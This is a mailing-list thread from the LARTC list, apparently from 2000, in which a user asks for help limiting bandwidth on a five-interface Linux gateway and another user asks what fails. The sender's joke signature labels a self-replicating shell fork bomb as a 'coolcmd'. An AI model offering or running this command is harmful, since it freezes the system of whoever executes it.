Subject: [LARTC] Bandwidth limiting

From: Thomas Habets <[email-masked]>
Date: Wed, 22 Nov 2000 01:00:08 +0100

Hello.

I need help with limiting bandwidth. I have read every tutorial I've come 
over and I just can't make anything work.

Ok, here's the scenario:

I have a gateway, which has five network interfaces (eth0 -> eth4), eth0 is 
the 'external' one and eth[1-4] are supposed to be limited to 128Kbit/s each. 

The interfaces eth[1-4] each have a C-class net, 192.168.[1-4].0/24.

Thanks for any and all help.

linux 2.4.0-test9
debian 2.2 (potato)

---------
typedef struct me_s {
  char name[]      = { "Thomas Habets" };
  char email[]     = { "[email-masked]" };
  char kernel[]    = { "Linux 2.2" };
  char *pgpKey[]   = { "finger -m [email-masked]" };
  char pgpfinger[] = { "6517 2898 6AED EA2C 1015  DCF0 8E53 B69F 524B B541" };
  char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;

---

From: "Daniel Bergqvist" <[email-masked]>
Date: Wed, 22 Nov 2000 15:25:18 +0100

Hi,

What doesn't work? Do you get error messages when you run TC or don't you
know how to use TC?

Regards,
Daniel

-----Ursprungligt meddelande-----
Från: [email-masked] [mailto:[email-masked]]För
Thomas Habets
Hello.

Ok, here's the scenario:

I have a gateway, which has five network interfaces (eth0 -> eth4), eth0 is
the 'external' one and eth[1-4] are supposed to be limited to 128Kbit/s
each.

linux 2.4.0-test9
debian 2.2 (potato)

---------
typedef struct me_s {
  char pgpfinger[] = { "6517 2898 6AED EA2C 1015  DCF0 8E53 B69F 524B
B541" };